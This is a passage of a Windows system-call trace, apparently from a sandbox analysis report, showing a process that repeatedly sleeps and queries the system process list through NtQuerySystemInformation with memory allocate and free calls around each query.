NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.458] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.458] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0143.459] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0143.460] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0143.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.462] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.463] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.476] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.476] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0143.476] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0143.477] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0143.477] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.479] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.479] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.489] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.489] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0143.490] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0143.490] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0143.490] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.492] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.493] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.505] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.505] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0143.505] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0143.506] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0143.506] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.508] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.508] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.520] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.521] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0143.521] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0143.521] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0143.521] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.523] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.524] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.536] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.537] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0143.537] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0143.538] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0143.538] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.541] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.542] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.552] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.552] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0143.553] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0143.553] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0143.553] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.556] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.556] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.567] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.567] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0143.568] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0143.568] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0143.568] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.570] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.570] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.584] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0143.585] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0143.585] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0143.585] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.587] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.587] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.598] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.599] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0143.599] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0143.599] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0143.600] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.602] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.602] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.614] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.614] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0143.615] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0143.615] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0143.615] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.617] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.618] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.630] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.630] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0143.630] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0143.631] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0143.631] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.633] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.634] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.645] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.645] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0143.646] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0143.646] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0143.647] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.649] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.650] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.661] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.661] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0143.662] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0143.662] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0143.662] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.664] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.665] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.678] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0143.680] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0143.680] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0143.680] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.683] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.684] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.692] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.692] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0143.693] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0143.693] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0143.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.695] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.696] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.708] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.708] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0143.708] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0143.708] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0143.709] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.710] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.711] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.723] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.723] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0143.724] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0143.724] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0143.724] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.726] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.727] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.739] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.739] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0143.740] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0143.740] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0143.740] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.742] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.742] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.754] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.755] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0143.755] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0143.755] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0143.755] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.757] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.758] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.770] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.770] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0143.771] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0143.771] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0143.771] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.773] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.773] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.786] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 